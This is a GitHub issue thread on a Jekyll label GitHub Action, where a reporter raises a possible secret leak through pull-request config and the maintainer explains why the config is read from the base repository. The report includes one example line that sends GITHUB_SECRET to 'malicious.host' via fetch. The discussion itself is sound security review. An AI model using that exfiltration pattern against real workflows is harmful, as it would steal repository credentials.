### ISSUE TITLE
Security: Attacker can extract secrets through malicious config changes.

### ISSUE THREAD

**Issue by MicahZoltu** [Pandapip1/jekyll-label-action#3]
https://github.com/Pandapip1/jekyll-label-action/blob/bfc2f4c2e738017a20b4822c229f02d1db79c59b/src/action.ts#L7

Since this needs write permissions, an attacker can setup a config in their PR like:
```ts
"type: Core": fetch(`malicious.host/${process.env.GITHUB_SECRET}`)
```
This will then get executed on this line in the action, and the extracted `GITHUB_SECRET` will have repository write permissions.

**Comment by Pandapip1** [comment]
This won't work. The relevant line of code that fetches this yml file is the following:

```
const response = await octokit.request(`GET /repos/${repository?.owner.login}/${repository?.name}/contents/.jekyll-labels.yml`);
```

It explicitly gets the file (via `GET` request) from the original repository's default branch. I appreciate your concern, however!

**Comment by MicahZoltu** [comment]
Can we get a comment added above that line that explains that this is fetched from the base repository for security reasons and elaborate a bit on that?  Normally I am not a fan of comments, but in this case the behavior is a bit unexpected and someone can imagine a future author seeing this as a bug and "fixing it" to fetch from the PR instead.

**Comment by Pandapip1** [comment]
> Can we get a comment added above that line that explains that this is fetched from the base repository for security reasons and elaborate a bit on that? Normally I am not a fan of comments, but in this case the behavior is a bit unexpected and someone can imagine a future author seeing this as a bug and "fixing it" to fetch from the PR instead.

Sure thing!
